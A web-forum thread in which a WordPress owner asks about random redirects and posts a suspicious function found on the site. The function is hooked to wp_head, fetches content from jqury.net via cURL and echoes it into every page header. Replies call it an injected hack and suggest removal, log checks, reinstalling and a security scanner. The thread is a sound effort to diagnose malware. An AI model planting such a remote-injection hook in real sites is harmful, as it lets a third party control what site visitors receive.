8 {{ upvoteCount | shortNum }}
8 {{ upvoteCount | shortNum }}

Site got hacked please help to confirm

by victorsh
6 replies
Hello

My site is redirecting at random times to a parked domain.

After doing some reseach I found out that this code might be doing it:

Code:
function wp__head() {
 if(function_exists('curl_init'))
 {
  $url = "http://www.jqury.net/?1"; 
  $ch = curl_init();  
  $timeout = 10;  
  curl_setopt($ch,CURLOPT_URL,$url); 
  curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
  curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
  curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); 
  $data = curl_exec($ch);  
  curl_close($ch); 
  echo "$data";
 }
}
add_action('wp_head', 'wp__head');

Can some one tell me what this code does and if this the root of the problem.

Thank you
#confirm #hacked #site
  • Profile picture of the author RenardNET
    That is for sure something you don't want to have. So remove that code instantly. It looks that it is safe to remove because function wp__head() is added by WP hook.

    When you visit URL www . jqury . net/?1 than in HTML source you will see set of html links. That links are injected into your HTML header. But it not have any code to redirect to that domains so you need to keep loking for other bad code if removing will not help as I am afraid.

    Good luck.

    Tom
    {{ DiscussionBoard.errors[8073875].message }}
  • Profile picture of the author RenardNET
    Ohh, and tell us in what WP theme or plugin you found this code so people will know what to avoid.

    Tom
    {{ DiscussionBoard.errors[8073890].message }}
  • Profile picture of the author P4tch
    If you have access to your own server and can view PHP and webserver logs, look at which files are using cURL and sending requests. It should be pretty simple to find the files that you need.
    {{ DiscussionBoard.errors[8076089].message }}
  • Profile picture of the author lordspace
    I'd export my site/blog's contents and reinstall it from scratch.

    Was your WordPress up-to-date?
    Did you use some cracked/hacked premium plugins?

    This script basically attaches itself to something called hook in WordPress terms which is basically an event. So when wordpress is about to output the page header it will actually output the contents coming from the mentioned site.
    Signature

    Are you using WordPress? Have you tried qSandbox yet?

    {{ DiscussionBoard.errors[8076649].message }}
  • Profile picture of the author WebdevelopmentGroup
    Yes your being hacked..did you get it sorted out? give me a call ill fix it up..
    Signature
    WebDevelopmentGroup NYC & CA- Small Business Web Development, App Development, WordPress Development, Graphic Designs, Online Marketing, Local Marketing & more!. "Call us 1.800.219.1314 or message us!". Visit us today! "Now On Live Chat Mon-Fri.". www.WebDevelopmentGroup.org
    (Whitelable our Services)
    ===================================
    ==> #1 OFFLINE MARKETING FORUM ON THE WEB! <==
    www.OFFLINEMARKETINGFORUM.com     (Register Now)
    {{ DiscussionBoard.errors[8080035].message }}
  • Profile picture of the author RobinInTexas
    It's a hack apparently designed to appear normal, perhaps part of something more complex than what appears. It's adding a new function that is similar to a stock "wp_head" "wp__head" is new.

    I would suggest installing Wordfence plugin and having it scan your site.

    It's scan does the following (and more)
    • Comparing core WordPress files against originals in repository
    • Comparing open source themes against WordPress.org originals
    • Comparing plugins against WordPress.org originals
    • Scanning for known malware files
    • Scanning file contents for infections and vulnerabilities
    • Scanning files for URLs in Google's Safe Browsing List
    • Scanning posts for URL's in Google's Safe Browsing List
    • Scanning comments for URL's in Google's Safe Browsing List
    • Scanning for old themes, plugins and core files

    You have to edit the options after installation, as the default scan doesn't check a couple of vital items.

    It will also protect your site from other bad things.
    Signature

    Robin



    ...Even if you're on the right track, you'll get run over if you just set there.
    {{ DiscussionBoard.errors[8080841].message }}

Trending Topics